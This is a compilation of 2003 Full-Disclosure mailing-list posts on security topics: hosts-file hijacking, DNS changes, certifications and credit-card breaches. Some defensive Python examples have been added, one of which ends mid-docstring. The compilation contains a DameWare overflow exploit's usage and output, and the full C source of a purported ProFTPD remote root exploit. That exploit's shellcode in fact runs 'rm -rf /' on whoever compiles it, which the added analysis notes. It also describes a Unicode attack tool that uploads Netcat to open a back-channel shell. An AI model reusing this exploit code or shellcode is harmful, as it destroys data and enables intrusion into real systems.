 I should have more information up on FreeKevin.com today, as well as
 DefensiveThinking.com.  If someone would like to contact me with a story
or
 a possible lead on a storyteller, please write to me at
 [EMAIL PROTECTED], or call at (310)689-7229.  I would appreciate
 any assistance you can offer.

 All my best,



 Kevin Mitnick

 -Original Message-
 From: [EMAIL PROTECTED]
 [mailto:[EMAIL PROTECTED] On Behalf Of Adik
 Sent: Friday, December 19, 2003 8:38 AM
 To: [EMAIL PROTECTED]; [EMAIL PROTECTED]
 Subject: [Full-Disclosure] [Exploit]: DameWare Mini Remote Control Server
 Overflow Exploit

 DameWare Mini Remote Control Server Exploit

 C:\xploits\dmware>dmware

 ...oO DameWare Remote Control Server Overflow Exploit Oo...

 -( by Adik netmaniac[at]hotmail.KG )-

  - Versions vulnerable: <= DWRCS 3.72.0.0
  - Tested on: DWRCS ver: 3.72.0.0 Win2k SP3 & WinXP SP1

  Usage: dmware TargetIP TargetPort YourIp YourPort
  eg: dmware 10.0.0.1 6129 10.0.0.2 21


 C:\xploits\dmware>dmware 192.168.63.130 6129 192.168.63.1 53

 ...oO DameWare Remote Control Server Overflow Exploit Oo...

 -( by Adik netmaniac[at]hotmail.KG )-

  - Versions vulnerable: <= DWRCS 3.72.0.0
  - Tested on: DWRCS ver: 3.72.0.0 Win2k SP3 & WinXP SP1

 [*] Target IP:  192.168.63.130  Port: 6129
 [*] Local IP:   192.168.63.1Listening Port: 53

 [*] Initializing sockets... [ OK ]
 [*] Binding to local port: 53...[ OK ]
 [*] Setting up a listener...[ OK ]

  OS Info   : WIN2000 [ver 5.0.2195]
  SP String : Service Pack 3

  EIP: 0x77db912b (advapi32.dll)

 [*] Constructing packet for WIN 2000 SP: 3...   [ OK ]
 [*] Connecting to 192.168.63.130:6129...[ OK ]
 [*] Packet injected

[Full-Disclosure] ProFTPD-1.2.9rc2 remote root exploit

2003-10-24 Thread Jean-Kevin Grosnakeur
Ladies and gentlemen, here's the source code of the exploit for the latest
release of ProFTPD. This is a Zero-Day private exploit, please DON'T
REDISTRIBUTE. I will not take responsibility for any damages which could
result from the usage of this exploit, use it at your own risk.
--
/*
Example of use:
# gcc exploit.c -o exploit
# ./exploit 192.168.1.1 21
Connected on 192.168.1.1:21
Exploitation in progress...
Exploitation string sent.
Trying to connect, please wait...
Linux michelle 2.4.20 #1 SMP Fri Mar 14 14:10:36 EST 2003 i686 unknown
unknown GNU/Linux
uid=0(root) gid=0(root) groupes=0(root)
*/

#include stdio.h
#include stdlib.h
#include sys/socket.h
#include sys/types.h
#include unistd.h
#include netdb.h
#define NOP 0x90
#define RET 0x6675636b
/* x86 bind shellcode */
char sc[]=
\x31\xc0\x50\x68\x66\x20\x2f\x58\x68\x6d\x20\x2d\x72\x68\x2d
\x63\x58\x72\x68\x41\x41\x41\x41\x68\x41\x41\x41\x41\x68\x41
\x41\x41\x41\x68\x41\x41\x41\x41\x68\x2f\x73\x68\x43\x68\x2f
\x62\x69\x6e\x31\xc0\x88\x44\x24\x07\x88\x44\x24\x1a\x88\x44
\x24\x23\x89\x64\x24\x08\x31\xdb\x8d\x5c\x24\x18\x89\x5c\x24
\x0c\x31\xdb\x8d\x5c\x24\x1b\x89\x5c\x24\x10\x89\x44\x24\x14
\x31\xdb\x89\xe3\x8d\x4c\x24\x08\x31\xd2\x8d\x54\x24\x14\xb0
\x0b\xcd\x80\x31\xdb\x31\xc0\x40\xcd\x80;
unsigned long resolve(char *hostname);
int give_me_a_shell(unsigned long dest);
int main(int argc, char *argv[])
 {
  int i, *ret;
  char *string;
  unsigned long addr;
  char buffer[1024];
  int port=21, fd, s;
  struct sockaddr_in addy;

  if(argc  2)
{
 fprintf(stdout, usage: %s host port\n, argv[0]);
 return(0);
}
  else addr=resolve(argv[1]);
  if(argv[2]) port=atoi(argv[2]);
  /* copy the NOPs to the buffer */
  memset(buffer, NOP, 1024);
  /* copy the shellcode to the buffer */
  for(i=0; i  strlen(sc); i++)
buffer[i+700]=sc[i];
  /* copy the return address to the buffer */
  for(i=815; i1003; i+=4)
*((int *)buffer[i]) = RET;
  string = (char *) malloc(strlen(buffer)+20);
  sprintf(string, \x4c\x4f\x56\x45 %s, buffer);
  fd = socket(AF_INET, SOCK_STREAM, 0);
  if(fd  0)
{
 fprintf(stderr, unable to socket()\n);
 return(-1);
}
  addy.sin_family= AF_INET;
  addy.sin_addr.s_addr   = addr;
  addy.sin_port  = htons(port);
  /* connect to remote host */
  if(connect(fd, (struct sockaddr *)addy, sizeof(addy))  0)
{
 fprintf(stderr, unable to connect()\n);
 return(-1);
}
  printf(Connected on %s:%d\n, inet_ntoa(addy.sin_addr), port);
  printf(Exploitation in progress...\n);
  /* send the exploitation string to the host */
  if(s = send(fd, string, sizeof(string), 0)  0)
{
 fprintf(stderr, unable to send()\n);
 return(-1);
}
  close(fd);
  printf(Exploitation string sent.\n);
  free(string);
  /* connect to the bindshell */
  printf(Trying to connect, please wait...\n);
  void(*sleep)()=(void*)sc;sleep(5);
  if(give_me_a_shell(addr)  0)
{
 fprintf(stderr, Sorry, exploit didn't work.\n);
 return(-1);
}
  return(0);
 }
unsigned long resolve(char *sname)
 {
  struct hostent * hip;
  hip = gethostbyname(sname);
  if (!hip)
{
 fprintf(stderr, unable to find %s\n,sname);
 exit(1);
}
  return *(unsigned long *)hip - h_addr;
 }
int give_me_a_shell(unsigned long addr)
 {
  int sock;
  fd_set fds;
  struct sockaddr_in shell;
  unsigned char buf[4096];
  char cmd[]=uname -a  id;
  sock = socket(AF_INET, SOCK_STREAM, 0);
  if(sock  0)
{
 fprintf(stderr, unable to socket()\n);
 return(-1);
}
  shell.sin_family  = AF_INET;
  shell.sin_port= htons(1337);
  shell.sin_addr.s_addr = addr;
  if(connect(sock, (struct sockaddr *)shell, sizeof(struct sockaddr))  0)
{
 fprintf(stderr, unable to connect()\n);
 close(sock);
 return(-1);
}
  send(sock, cmd, strlen(cmd), 0);

  while(1)
{
 FD_ZERO(fds);
 FD_SET(0, fds);
 FD_SET(sock, fds);
 if(select(255, fds, NULL, NULL, NULL) == -1)
   {
fprintf(stderr, unable to select()\n);
close(sock);
return(-1);
   }
  memset(buf, 0, sizeof(buf));
  if(FD_ISSET(sock, fds))
{
 if(recv(sock, buf, sizeof(buf), 0)  0)
   {
fprintf(stderr, unable to recv()\n);
close(sock);
return(-1);
   }
 fprintf(stderr, %s, buf);
}
   if(FD_ISSET(0, fds))
 {
  read(0, buf, sizeof(buf));
  if(!strcmp(buf, quit))
{
 close(sock);
 return(0);
}
  write(sock, buf, strlen(buf));
 }
  }
 }
--

Have fun ! @+


___
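The ProFTPD post above calls its own "shellcode" directly on the machine running the program (`void(*sleep)()=(void*)sc;sleep(5);`) before anything is sent, which makes those bytes worth reading before compiling. The Python emulator below is an added example, not code from the original post: it handles just the stack-building instruction subset such strings use and reports the execve they reach, which for the posted bytes is /bin/sh -c "rm -rf /". STACK_BASE is an assumed value.

```python
"""Recover the system call a posted x86-32 "shellcode" actually makes.

Added example, not code from the original post. It emulates only the small
instruction subset such strings use to build arguments on the stack (push,
xor, mov/lea with [esp+disp8], mov al, int 0x80), so the bytes can be read
without ever being executed; any other opcode raises, which is itself useful
information about an unknown blob. STACK_BASE is an assumed value."""
import struct

# The byte string exactly as posted in the message above, kept as data only.
POSTED_SHELLCODE = (
    b"\x31\xc0\x50\x68\x66\x20\x2f\x58\x68\x6d\x20\x2d\x72\x68\x2d"
    b"\x63\x58\x72\x68\x41\x41\x41\x41\x68\x41\x41\x41\x41\x68\x41"
    b"\x41\x41\x41\x68\x41\x41\x41\x41\x68\x2f\x73\x68\x43\x68\x2f"
    b"\x62\x69\x6e\x31\xc0\x88\x44\x24\x07\x88\x44\x24\x1a\x88\x44"
    b"\x24\x23\x89\x64\x24\x08\x31\xdb\x8d\x5c\x24\x18\x89\x5c\x24"
    b"\x0c\x31\xdb\x8d\x5c\x24\x1b\x89\x5c\x24\x10\x89\x44\x24\x14"
    b"\x31\xdb\x89\xe3\x8d\x4c\x24\x08\x31\xd2\x8d\x54\x24\x14\xb0"
    b"\x0b\xcd\x80\x31\xdb\x31\xc0\x40\xcd\x80"
)

EAX, ECX, EDX, EBX, ESP = 0, 1, 2, 3, 4
STACK_BASE = 0xBFFFF000   # assumed initial esp; any non-zero value works
SYS_EXECVE = 11
MASK = 0xFFFFFFFF


class Machine:
    """Registers plus the slice of stack the code has built so far."""
    def __init__(self):
        self.reg = [0] * 8
        self.reg[ESP] = STACK_BASE
        self.mem = bytearray()      # mem[0] is always the byte at esp

    def push(self, value):
        self.reg[ESP] = (self.reg[ESP] - 4) & MASK
        self.mem[0:0] = struct.pack("<I", value & MASK)

    def off(self, addr):
        o = addr - self.reg[ESP]
        if not 0 <= o < len(self.mem):
            raise ValueError(f"address {addr:#x} is outside the built stack")
        return o

    def cstring(self, addr):
        o = self.off(addr)
        end = self.mem.find(b"\0", o)
        return self.mem[o:end if end >= 0 else None].decode("latin-1")

    def dword(self, addr):
        o = self.off(addr)
        return struct.unpack("<I", self.mem[o:o + 4])[0]

    def ptr_array(self, addr):
        """Follow a NULL-terminated pointer array (argv/envp) to its strings."""
        out = []
        while (p := self.dword(addr)) != 0:
            out.append(self.cstring(p))
            addr += 4
        return out


def emulate(code):
    """Run the subset and return the execve call reached, or None."""
    m, i = Machine(), 0
    while i < len(code):
        op, modrm = code[i], (code[i + 1] if i + 1 < len(code) else 0)
        if op == 0x31 and modrm >> 6 == 3:                  # xor r32, r32
            m.reg[modrm & 7] ^= m.reg[(modrm >> 3) & 7]; i += 2
        elif op == 0x50:                                    # push eax
            m.push(m.reg[EAX]); i += 1
        elif op == 0x68:                                    # push imm32
            m.push(struct.unpack("<I", code[i + 1:i + 5])[0]); i += 5
        elif op in (0x88, 0x89, 0x8D) and (modrm & 0xC7) == 0x44 \
                and code[i + 2] == 0x24:                    # [esp+disp8] forms
            r, addr = (modrm >> 3) & 7, m.reg[ESP] + code[i + 3]
            if op == 0x88:                                  # mov [esp+d], r8
                m.mem[m.off(addr)] = m.reg[r] & 0xFF
            elif op == 0x89:                                # mov [esp+d], r32
                o = m.off(addr); m.mem[o:o + 4] = struct.pack("<I", m.reg[r])
            else:                                           # lea r32, [esp+d]
                m.reg[r] = addr
            i += 4
        elif op == 0x89 and modrm >> 6 == 3:                # mov r32, r32
            m.reg[modrm & 7] = m.reg[(modrm >> 3) & 7]; i += 2
        elif op == 0xB0:                                    # mov al, imm8
            m.reg[EAX] = (m.reg[EAX] & 0xFFFFFF00) | modrm; i += 2
        elif op == 0x40:                                    # inc eax
            m.reg[EAX] = (m.reg[EAX] + 1) & MASK; i += 1
        elif op == 0xCD and modrm == 0x80:                  # int 0x80
            if m.reg[EAX] == SYS_EXECVE:
                return {"syscall": "execve", "filename": m.cstring(m.reg[EBX]),
                        "argv": m.ptr_array(m.reg[ECX]),
                        "envp": m.ptr_array(m.reg[EDX])}
            i += 2
        else:
            raise ValueError(f"unsupported opcode {op:#04x} at offset {i}")
    return None
```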


[Full-Disclosure] Windows hosts file changing.

2003-10-22 Thread Kevin Gerry
Does -ANYBODY- know how it occurs?

I've had this happen to a couple boxes of mine now...

New one:
--
127.0.0.1   localhost
66.40.16.131livesexlist.com
66.40.16.131lanasbigboobs.com
66.40.16.131thumbnailpost.com
66.40.16.131adult-series.com
66.40.16.131www.livesexlist.com
66.40.16.131www.lanasbigboobs.com
66.40.16.131www.thumbnailpost.com
66.40.16.131www.adult-series.com
--

Any idea how the search site is replacing that? =/ It's starting to piss me
off =/ I had some custom information in there that's now overwritten (Not
backed up)

Thanks =/

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
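The file in the post has the signature of a rewrite rather than a hand edit: one outside address absorbing many unrelated names. The Python audit below is an added example, not from the original post, that parses a hosts file and reports non-loopback mappings grouped by address; the sample file content and the allow-list are constructed.

```python
"""Audit a Windows hosts file for hijacked entries.

Flags any mapping whose address is neither loopback nor on an explicit
allow-list, and groups the hits by address so a bulk rewrite (many names
pointed at one outside address) stands out. Added example; the sample
content and allow-list below are constructed, not the file from the post."""
import ipaddress
from collections import defaultdict

# Constructed sample with the same shape as the file in the post: the
# loopback entry survives, several unrelated names point at one outside IP.
SAMPLE_HOSTS = """\
# Copyright (c) 1993-1999 Microsoft Corp.
127.0.0.1       localhost
192.0.2.55      ad-network.example
192.0.2.55      www.ad-network.example
192.0.2.55      search-redirect.example
10.0.0.7        intranet.corp.example   # our own entry
"""

# Addresses an admin deliberately put in the file (constructed allow-list).
ALLOWED = {"10.0.0.7"}


def parse_hosts(text):
    """Yield (ip, hostname) pairs; comments and blank lines are skipped and
    a line carrying several names yields one pair per name."""
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        fields = line.split()
        try:
            ip = ipaddress.ip_address(fields[0])
        except ValueError:
            continue  # malformed line; not what this audit is looking for
        for name in fields[1:]:
            yield str(ip), name.lower()


def audit_hosts(text, allowed=frozenset()):
    """Return {ip: [names]} for every address that is neither loopback
    nor on the allow-list; an empty dict means nothing unexpected."""
    suspicious = defaultdict(list)
    for ip, name in parse_hosts(text):
        if ipaddress.ip_address(ip).is_loopback or ip in allowed:
            continue
        suspicious[ip].append(name)
    return dict(suspicious)


def bulk_redirects(suspicious, threshold=3):
    """Addresses that absorb `threshold` or more names: the signature of a
    scripted rewrite rather than a single hand-edited entry."""
    return {ip: names for ip, names in suspicious.items()
            if len(names) >= threshold}


if __name__ == "__main__":
    hits = audit_hosts(SAMPLE_HOSTS, ALLOWED)
    for ip, names in bulk_redirects(hits).items():
        print(f"{ip} hijacks {len(names)} names: {', '.join(names)}")
```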


Re: [Full-Disclosure] Application level firewall

2003-10-17 Thread Kevin Currie
Jason Freidman wrote:
Is there any sort of application level firewall for linux?  Something
like Zone alarm where you can trust an application?  I think that
openBSD has something that allows you to choose which system calls a
program can run.
You want systrace, which is the package OpenBSD is using.  It is also available for Linux and Mac OS X.   See here:  http://www.citi.umich.edu/u/provos/systrace/



___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Re: [Full-Disclosure] Shift key breaks CD copy locks

2003-10-09 Thread Kevin Sullivan
But by ATF standards, the Windows operating system and keyboard would not 
need to be installed on the computer - simply possessing both components 
would be enough to bust you. Of course if you are running Windows 3.11 and 
you lawfully possessed it prior to 1995 you would be grandfathered...


If you wanted to take the ATF's approach, it's not just having a
keyboard that is breaking the law, it's the combination of having a
keyboard AND the Windows operating system installed




___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


[Full-Disclosure] Mystery DNS Changes

2003-10-01 Thread Hansen, Kevin

We have seen multiple instances where DHCP enabled workstations have had their DNS reconfigured to point to two of the three addresses listed below. Can anyone else confirm this? Incidents.org is reporting an increase in port 53 traffic over the last two days. Are we looking at the precursor to the next worm?

216.127.92.38
69.57.146.14
69.57.147.175


-KJH



++
Kevin J. Hansen
Architect
Global Network
Thomson Legal  Regulatory
[EMAIL PROTECTED]
651-687-8466
++






RE: [Full-Disclosure] Israeli boffins crack GSM code

2003-09-09 Thread Kevin Spett
More info at Cryptome:

http://cryptome.org/gsm-crack.htm
http://www.k4d4th.org/pub/crypto/cryptome/cryptout.htm#GSM


-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] Behalf Of Richard Spiers
Sent: Tuesday, September 09, 2003 9:10 AM
To: [EMAIL PROTECTED]
Subject: [Full-Disclosure] Israeli boffins crack GSM code


Hi guys, anybody got more information on this? Any thoughts?

http://www.theregister.co.uk/content/55/32653.html

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


RE: [Full-Disclosure] Israeli boffins crack GSM code

2003-09-09 Thread Kevin Spett
Dude, you've got to find some new people to party with.

 Sorry, which GSM code would this be? Because I distinctly 
 remember being
 at a party years ago where the GSM code (some weak variant of A5) was
 shown to be weak and hackable.  This was back in 1998...

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Re: [Full-Disclosure] eBay Security Contact

2003-05-01 Thread Kevin Spett
I recommend calling support and asking to speak with a supervisor, and then
their supervisor's supervisor, etc. etc.  That's worked well for me at a
number of companies.



Kevin.

- Original Message - 
From: [EMAIL PROTECTED]
To: [EMAIL PROTECTED]; [EMAIL PROTECTED]
Sent: Thursday, May 01, 2003 1:25 PM
Subject: [Full-Disclosure] eBay Security Contact


 Hello,

 I'm looking for contact information for the security department (if such a
 thing exists) at eBay.  If anyone has any security contact information
 (specifically, I'm looking for e-mail addresses), or just general
support
 information where I can reach a human -- as such information appears to be
 deeply buried.  I'm really starting to become frustrated by the lack of
 support; everything they have is automated/robotic, and even that doesn't
 really

 


 ___
 Full-Disclosure - We believe in it.
 Charter: http://lists.netsys.com/full-disclosure-charter.html


___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Re: [Full-Disclosure] Security Certifications

2003-03-10 Thread Kevin Spett
No way... if they were Certified Idiots they'd be easier to identify.



Kevin.

- Original Message -
From: rrm [EMAIL PROTECTED]
To: 'Leo Security' [EMAIL PROTECTED]; 'Rizwan Ali Khan'
[EMAIL PROTECTED]; [EMAIL PROTECTED];
[EMAIL PROTECTED]
Cc: [EMAIL PROTECTED]
Sent: Saturday, March 08, 2003 7:45 PM
Subject: RE: [Full-Disclosure] Security Certifications


 We could really do with less certified idiots.

 -Original Message-
 From: [EMAIL PROTECTED]
 [mailto:[EMAIL PROTECTED] On Behalf Of Leo Security
 Sent: Saturday, March 08, 2003 7:19 PM
 To: Rizwan Ali Khan; [EMAIL PROTECTED];
 [EMAIL PROTECTED]
 Cc: [EMAIL PROTECTED]
 Subject: Re: [Full-Disclosure] Security Certifications

 I have checked the content and syllabi of most of the subjects offered
 for these certs and was disappointed. They are a waste of time. My
 advice will be to use your time for the deep study of operating systems.
 That would make you a better security analyst. Most employers have had
 it with certs and do not give much importance to it any more.
 Certifications were hot until 2000. Their value is going downhill since
 then.

 I would only go for certs if my employer requires it and pays me for it.
 I will never like to spend my own money on certs.

 That's my opinion.

 regards
 Leo

 hellNbak wrote:
  Be sure when filling out the questionnaire from ISC2 that you lie if you
  have been a part of any hacking groups or have used a nym.  Honesty
*IS
  NOT* the best policy in this case.
 
  I have a friend in Tokyo who took the lead auditor course and passed the
  test, he said it was horrible and not worth the time or money
 
  On Fri, 7 Mar 2003, Ron DuFresne wrote:
 
 
 Date: Fri, 7 Mar 2003 09:08:21 -0600 (CST)
 From: Ron DuFresne [EMAIL PROTECTED]
 To: Rizwan Ali Khan [EMAIL PROTECTED]
 Cc: [EMAIL PROTECTED], [EMAIL PROTECTED],
  [EMAIL PROTECTED]
 Subject: Re: [Full-Disclosure] Security Certifications
 
 
 
 Your quickest bet here is to do a google search on cisa and then on cissp.
 You'll get pointers to the governing bodies and such, pointers to lists of
 pretesting help, local affiliations as well as testing sites in the near
 future and much more in the first 10-20 links google returns.
 
 Thanks,
 
 Ron DuFresne
 
 On Thu, 6 Mar 2003, Rizwan Ali Khan wrote:
 
 
 I have heard of CISA and CISSP as Security
 Certifications, but could someone shed some light and
 give information about the governing bodies of the
 following Certifications, and where to get their
 suggested training material/ books etc.
 
 And if it is possible to give their exams from
 Pakistan?
 
 
 BS7799/ISO7799 lead auditor
 Prince 2
 SSCP
 CISM
 CISMP
 TCSEC
 SCP
 
 
 
 
 
 
 
 ~~
 Cutting the space budget really restores my faith in humanity.  It
 eliminates dreams, goals, and ideals and lets us get straight to the
 business of hate, debauchery, and self-annihilation. -- Johnny Hart
  ***testing, only testing, and damn good at it too!***
 
 OK, so you're a Ph.D.  Just don't touch anything.
 
 
 
 




___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Re: [Full-Disclosure] ./makeunicode2.py release announcement

2003-02-27 Thread Kevin Spett
 Or like a meeting of nuns and hookers to discuss sex.
 
 Georgi

I don't know about you, but I would go see that discussion.



Kevin.
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Re: [Full-Disclosure] Cryptome Hacked!

2003-02-26 Thread Kevin Spett
 damage its integrity.

 e) How is John Young an extremist?
 Would you describe him as being conservative, or moderate in his approach?
 If not, he is an extremist in my eyes.

Again, you choose to oversimplify things... are conservative, moderate and
extreme the only things that are out there?  When I think of extremists, I
think of people like the Black Panthers, Adolf Hitler, Hamas and Thomas
Jefferson.  John Young runs a website.  He simply isn't in the running for
Extremism.

 Are you trying to imply that John Young is trojaning
 the software that his site (infrequently) distributes?

 Not at all.  I believe that Mr. Young wishes to provide his
 community access to good crypto software.  I also believe
 that he is committed to his cause.  However, I do think that
 those who work for/with No Such Agency would like that.

You think that the NSA is modifying widely distributed crypto software?
Okay, that's possible.  How about some proof?  You can speculate endlessly
on the behaviour of an organization that no one has a lot of information
about.

 Cryptome (note Crypt) does indeed distribute and advocate the
 use of PGP and other encryption and/or privacy enhancing software.
 Given the more-paranoid-than-normal state of most of the cryptome
 visitors (myself included), I would think that quite a high percentage
 of them download and use the software for their own reasons.

You posted a message saying that cryptome had been hacked and that you were
concerned about software that it mirrors might be tampered with not only on
Cryptome but on other sites.  The software that cryptome has is also located
in many, many other places and thus it would be easy to spot differences
between them.  If you want to start asking "how do I trust the hashing
tool", "how do I trust the crypto algorithm" or "how do I trust the compiler
that I'm using to build the code that I wrote to implement the algorithm",
you've wandered outside the scope of what most people on this list care to
answer.

 In conclusion, for you to attempt to describe cryptome as if it was
 C-SPAN, or the Library of Congress is incredible.  If you believe that
 the operators of cryptome have good intentions towards the US government,
 then you are also naive.

Cryptome is a site that strongly promotes a very specific agenda which is
often at odds with established public policy and popular opinion.  It also
publishes opinions of dissent that it may not fully support but feel deserve
discussion and exposure.  Neither John Young nor Cryptome are many of the
things that you have described them as.  The purpose of my message was to
point out what I believe were errors in how you portrayed them.


Kevin.

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Re: [Full-Disclosure] Hackers View Visa/MasterCard Accounts

2003-02-18 Thread Kevin Spett
Here's an excerpt from the posting to net-security.org:

-
The hacker breached the security system of a company that processes credit
card transactions on behalf of merchants, Visa and MasterCard said.
-

Looks like someone just ran off with a database.  I haven't done any math,
but I'd think that brute forcing that many card numbers and expiration dates
would take ages.

Kevin.


- Original Message -
From: Jason Coombs [EMAIL PROTECTED]
To: [EMAIL PROTECTED]
Sent: Tuesday, February 18, 2003 4:28 AM
Subject: [Full-Disclosure] Hackers View Visa/MasterCard Accounts


 So, anyone know whether this was a simple real-time credit card processing
 oracle attack where a tool throws fake orders at sites that provide
 real-time credit card authorizations until a valid card number and
 expiration date are found?

 Any third-grader with a copy of Microsoft .NET or Java 2 class libraries
 could whip up the code needed to bang away at the typical e-commerce site
 logging rejected orders due to invalid credit card payment and revealing
 card numbers and expiration dates that can be used for fraud in a variety of
 ways.

 There must be such credit card hacking tools circulating for the benefit
 of script kiddies -- anyone looked into this before? If so, will you share
 some references?

 Jason Coombs
 [EMAIL PROTECTED]

 --

 Hackers View Visa/MasterCard Accounts

 Mon February 17, 2003 11:17 PM ET

 NEW YORK (Reuters) - More than five million Visa and MasterCard accounts
 throughout the nation were accessed after the computer system at a third
 party processor was hacked into, according to representatives for the card
 associations.



___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
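Added example, not part of Jason's or Kevin's posts: seen from the processor's or merchant's side, the real-time authorization oracle Jason speculates about would show up in the authorization log as a burst of declined authorizations from one source across many distinct card numbers, which is what a legitimate customer retrying one card does not produce. The detector below keeps a sliding window of declines per source and flags a source once it has tried a threshold number of distinct cards inside the window. The log format, the field names, the 60-second window and the threshold of 5 are all assumptions, and the log lines are constructed.

```python
"""Flag card-testing bursts in a (constructed) authorization log.

Example code, not from the list thread. Log format assumed:
    ISO-timestamp,client_ip,card_last4,result
where result is APPROVED or DECLINED.
"""
from collections import defaultdict, deque
from datetime import datetime, timedelta

DECLINE_THRESHOLD = 5           # distinct cards declined before we flag (assumed)
WINDOW = timedelta(seconds=60)  # sliding window length (assumed)

# Constructed sample: 10.1.1.20 cycles through six cards in 30 seconds,
# 10.1.1.30 is one customer retrying the same card, and 10.1.1.40 has five
# declines but spread two minutes apart, so never enough inside one window.
SAMPLE_AUTH_LOG = [
    '2003-02-18T04:28:00,10.1.1.20,1111,DECLINED',
    '2003-02-18T04:28:05,10.1.1.30,4242,APPROVED',
    '2003-02-18T04:28:06,10.1.1.20,2222,DECLINED',
    '2003-02-18T04:28:12,10.1.1.20,3333,DECLINED',
    '2003-02-18T04:28:18,10.1.1.20,4444,DECLINED',
    '2003-02-18T04:28:20,10.1.1.30,4242,DECLINED',
    '2003-02-18T04:28:24,10.1.1.20,5555,DECLINED',
    '2003-02-18T04:28:30,10.1.1.20,6666,DECLINED',
    '2003-02-18T04:30:00,10.1.1.40,7777,DECLINED',
    '2003-02-18T04:32:00,10.1.1.40,8888,DECLINED',
    '2003-02-18T04:34:00,10.1.1.40,9999,DECLINED',
    '2003-02-18T04:36:00,10.1.1.40,1234,DECLINED',
    '2003-02-18T04:38:00,10.1.1.40,5678,DECLINED',
]


def parse_line(line):
    """Split one log line into (timestamp, client_ip, card_last4, result)."""
    ts, ip, last4, result = line.strip().split(',')
    return datetime.fromisoformat(ts), ip, last4, result


def detect_card_testing(lines, threshold=DECLINE_THRESHOLD, window=WINDOW):
    """Sliding-window detector over declined authorizations per source IP.

    Returns {client_ip: (time_first_flagged, distinct_cards_in_window)} for
    every source that had `threshold` or more *distinct* card numbers
    declined within `window`. Counting distinct cards rather than raw
    declines keeps one customer retrying a single bad card from triggering it.
    """
    recent = defaultdict(deque)   # ip -> deque of (timestamp, last4) declines
    flagged = {}
    for line in lines:
        ts, ip, last4, result = parse_line(line)
        if result != 'DECLINED':
            continue
        q = recent[ip]
        q.append((ts, last4))
        while q and ts - q[0][0] > window:   # drop declines older than the window
            q.popleft()
        distinct = {card for _, card in q}
        if len(distinct) >= threshold and ip not in flagged:
            flagged[ip] = (ts, len(distinct))
    return flagged


if __name__ == '__main__':
    for ip, (when, count) in detect_card_testing(SAMPLE_AUTH_LOG).items():
        print(f'{ip}: {count} distinct cards declined within {WINDOW} at {when.isoformat()}')
```

In a real deployment the same window would be keyed on more than the source address (a proxy or a botnet spreads the attempts), and the response is to rate-limit or step up verification for that source, not to block the cards being tried.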



Re: [Full-Disclosure] Hackers View Visa/MasterCard Accounts

2003-02-18 Thread Kevin Spett
I heard it was your mom.



Kevin.
- Original Message - 
From: KF [EMAIL PROTECTED]
To: [EMAIL PROTECTED]
Sent: Tuesday, February 18, 2003 5:32 AM
Subject: Re: [Full-Disclosure] Hackers View Visa/MasterCard Accounts


 Does anyone know who the third party processor was?
 -KF
 
 
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html



RE: [Full-Disclosure] Unusual request

2003-02-13 Thread Timm, Kevin
Unicoder by HDmoore will do a lot of unicode checks, plus it can be used over SSL to evade a NID or through a proxy to obfuscate your IP. I wrote a little add-on to it called firerunner that would actually do the exploit and ftp Netcat to the host. After that was finished it would connect back to a Netcat listener with a cmd prompt. The whole process took less than 10 seconds. I tracked down a copy of it. It is kind of old and there are probably some coding errors on my part, since it was really just a test and never released. Here it is. Keep in mind it's pretty old but with a little love should be able to demonstrate Unicode attacks and back channel connections as well as the ability to use a proxy. The script allows it to function as such:

Attack from IP 1 (which could be a proxy) 
FTP Netcat from another IP 
Create connection to a 3rd ip 


Good luck. 


Kevin 



-Original Message-
From: Rapaille Max [mailto:[EMAIL PROTECTED]]
Sent: Thursday, February 13, 2003 7:58 AM
To: Schmehl, Paul L; Full-Disclosure
Subject: RE: [Full-Disclosure] Unusual request



Hi,


I did this kind of demo 2-3 times already, with a Win2k SP2 and IIS.
To add a layer, we just added a firewall between the IIS and the attacker PC .. with just Port 80 incoming and, as (too) usual, all ports open for outgoing... Just using a unicode exploit, and then loading some tools, defacing web page, taking remote control, etc... A lot of fun for us, and great astonishment for the public.. Certainly with the firewall.. A lot of them were just saying, before the demo: We are secure, our integrator installed a firewall...

BTW, we also used some tools like unicoder.pl and Upload.asp, to demonstrate, as a second step, how easy it is, even if you don't know what you do...

Good effect of awareness for those managers, Engineer, etc...



Good luck.


Max


-Original Message-
From: Schmehl, Paul L [mailto:[EMAIL PROTECTED]] 
Sent: 13 February 2003 14:37
To: Full-Disclosure
Subject: RE: [Full-Disclosure] Unusual request



Thanks to all who offered suggestions. I don't know why I couldn't remember unicode when I was googling, but then I've read thousands of man pages and docs since then, and my mind can only hold so much information. :-)

What I plan to do is load a box with a default install of IIS and use a web browser based attack to demonstrate how easily a box can be compromised when it's unpatched. (I'll probably just deface a web page.) Since the audience will be normal users, I expect most of them to be astounded and incredulous, which is why I wanted to use something very simple to understand. If I ran a program through a netcat session, I suspect many of them wouldn't get it, but if I type a URL into a browser, I *hope* they will all see that *anyone* could do that, even with very little knowledge of exploits or security practices.

And before you ask, no the box will not be connected to our LAN. Otherwise it would get Code Red and Nimda before I could even complete my demonstration. :-)

Paul Schmehl ([EMAIL PROTECTED])
Adjunct Information Security Officer
The University of Texas at Dallas http://www.utdallas.edu/~pauls/ AVIEN Founding Member 







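Added example, not from Kevin Timm's post or his script: the IIS "Unicode" traversal that these demos rely on worked because the server checked the path for ".." before it decoded overlong UTF-8 forms such as %c0%af into "/", and a NIDS that matches on the raw URL misses the request for the same reason. The Python below decodes first and checks second, and goes beyond the 2-byte case the thread implies by also handling 3-byte overlong forms and double percent-encoding (%255c). It is example code; the W3C-style log lines are constructed, and the field positions and label names are assumptions.

```python
"""Canonicalize percent-encoded request paths before checking for traversal.

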